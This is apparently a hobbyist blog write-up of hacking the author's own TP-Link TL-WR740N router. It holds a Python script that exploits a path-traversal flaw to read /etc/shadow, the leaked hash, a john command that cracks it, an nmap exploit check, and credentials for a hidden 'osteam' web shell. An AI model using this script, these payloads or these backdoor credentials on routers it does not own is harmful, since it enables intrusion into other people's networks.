I have a TL-WR740N router (it is an old one), that I was trying to gain access to its firmware which I think it is OpenWRT, but nmap reports that it is TP-Link WAP… so idk (yet)! I scanned the ports hoping to find an open Telnet or SSH port (ZTE router has TELNET port opened by the way!!!) but they are not, here is my primary scan:
# nmap -sT 192.168.0.1 Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-19 00:38 EEST Nmap scan report for 192.168.0.1 (192.168.0.1) Host is up (0.0028s latency). Not shown: 998 closed ports PORT STATE SERVICE 80/tcp open http 1900/tcp open upnp MAC Address: 00:27:19:FD:4E:2A (Tp-link Technologies CO.) Nmap done: 1 IP address (1 host up) scanned in 0.59 seconds
SO … I went to test the graphical inteface (web interface of the router on http://192.168.0.1/), here how the page looks like:
A little about the interface, I checked the source code and found out that the webpage uses tags to load the site content.
<FRAMESET cols=160,55%,*> <FRAMESET rows=72,* frameSpacing=0 frameBorder=0> <FRAME name=productphoto marginWidth=0 marginHeight=0 src="/images/productphoto.gif" noResize scrolling=no> <FRAME name=bottomLeftFrame marginWidth=0 marginHeight=0 src="/userRpm/MenuRpm.htm" noResize> </FRAMESET> <FRAME name=mainFrame marginWidth=0 marginHeight=0 src="/userRpm/StatusRpm.htm" frameBorder=0> <FRAME name=helpFrame marginWidth=0 marginHeight=0 src="/help/StatusHelpRpm.htm" frameBorder=1> </FRAMESET>
I made a list of the available directories/paths:
- root, http://192.168.0.1/ which is represented by ‘/’
- frames, http://192.168.0.1/frames/
- images, http://192.168.0.1/images/
- help, http://192.168.0.1/help/
- userRpm (whatever that is), http://192.168.0.1/userRpm/
So now I have to check for directory traversal vulnerability (and I found it).
I don’t know how many directories I needed to jump back to reach for /etc/shadow file (or /etc/passwd), I may have to test (using hackbar plugin maybe) a payload like this: http://192.168.0.1/images/../../../etc/shadow.
Something to notice here, that urllib – that I used to download the html pages – will return an error “IOError: (‘http protocol error’, 0, ‘got a bad status line’, None)” and exit if the target url is not … an html file (I think), I really don’t care about this as I personally don’t use urllib anymore (I switched to mechanize a while ago) but… anyway (this is just a notice)!
My full script:
import urllib import time depth = 5 host = 'http://192.168.0.1/' path = '../' target = 'etc/shadow' htmltext = '' fullpath = '' limit = 0 directories = ['', 'frames/', 'images/','help/'] for i in range(1,depth): fullpath += path for directory in directories: url = host + directory + fullpath + target print "Testing: ", url try: htmltext = urllib.urlopen(url).read() except: pass if ("root" in htmltext): print url, " is vulnerable" else: time.sleep(2) continue
The program (more precisely urllib) will prompt for user/password, the default username and password for TL-W740N router is admin/admin.
Testing: http://192.168.0.1/../etc/shadow Testing: http://192.168.0.1/frames/../etc/shadow Enter username for TP-LINK Wireless Lite N Router WR740N at 192.168.0.1: admin Enter password for admin in TP-LINK Wireless Lite N Router WR740N at 192.168.0.1: Testing: http://192.168.0.1/images/../etc/shadow Testing: http://192.168.0.1/help/../etc/shadow Testing: http://192.168.0.1/../../etc/shadow Testing: http://192.168.0.1/frames/../../etc/shadow http://192.168.0.1/frames/../../etc/shadow is vulnerable Testing: http://192.168.0.1/images/../../etc/shadow http://192.168.0.1/images/../../etc/shadow is vulnerable Testing: http://192.168.0.1/help/../../etc/shadow http://192.168.0.1/help/../../etc/shadow is vulnerable
So … if you run this script with -i option (pyhon -i ) you will end in the interactive mode (good for debugging), so I checked the value of htmltext and what do you know
>>> print htmltext TL-WR740N // root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7::: Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7::: bin::10933:0:99999:7::: daemon::10933:0:99999:7::: adm::10933:0:99999:7::: lp:*:10933:0:99999:7::: sync:*:10933:0:99999:7::: shutdown:*:10933:0:99999:7::: halt:*:10933:0:99999:7::: uucp:*:10933:0:99999:7::: operator:*:10933:0:99999:7::: nobody::10933:0:99999:7::: ap71::10933:0:99999:7:::
Not bad so far! So now what?
I copied the line that has root account in it to a file and named it root.password, and using john:
john --show root.password
I got the password, it is 5up (default password I guess)
Anyway… now what? (this is REALLY interesting)
Well… I did my research, and this is what I found:
Some TP-Link routers has a hidden web shell, that you can access using this url:
The user name is osteam, and the password is 5up, here how this interface looks like:
And there is a nmap script actually to test this vulnerability in TP-Link routers
nmap -p80 --script http-tplink-dir-traversal -Pn -n 192.168.0.1 Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-19 02:33 EEST Nmap scan report for 192.168.0.1 Host is up (0.00016s latency). PORT STATE SERVICE 80/tcp open http | http-tplink-dir-traversal: | VULNERABLE: | Path traversal vulnerability in several TP-Link wireless routers | State: VULNERABLE (Exploitable) | Description: | Some TP-Link wireless routers are vulnerable to a path traversal vulnerability that allows attackers to read configurations or any other file in the device. | This vulnerability can be exploited without authenticatication. | Confirmed vulnerable models: WR740N, WR740ND, WR2543ND | Possibly vulnerable (Based on the same firmware): WR743ND,WR842ND,WA-901ND,WR941N,WR941ND,WR1043ND,MR3220,MR3020,WR841N. | Disclosure date: 2012-06-18 | Extra information: | /etc/shadow : | | root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7::: | Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7::: | bin::10933:0:99999:7::: | daemon::10933:0:99999:7::: | adm::10933:0:99999:7::: | lp:*:10933:0:99999:7::: | sync:*:10933:0:99999:7::: | shutdown:*:10933:0:99999:7::: | halt:*:10933:0:99999:7::: | uucp:*:10933:0:99999:7::: | operator:*:10933:0:99999:7::: | nobody::10933:0:99999:7::: | ap71::10933:0:99999:7::: | | References: |_ http://websec.ca/advisories/view/path-traversal-vulnerability-tplink-wdr740 MAC Address: 00:27:19:FD:4E:2A (Tp-link Technologies CO.) Nmap done: 1 IP address (1 host up) scanned in 0.55 seconds
By the way… I mirrored the website using webhttrack (httrack) but I didn’t get anythig interesting… but when using the web shell, I went to the web directory and there is a folder names “userRpm” and there I found lots of interesting files, I am still digging into this router (I want to see if I can upload a file or add new commands maybe!)
TL-WR740N routers are common here where I live (and in Mexico as well), and they are not secured … in fact you should be careful with the router you are using and double check and test it for security.
[note]: this is VERY interesting video about hacking routers (I applied that method on ZTE router and got great results)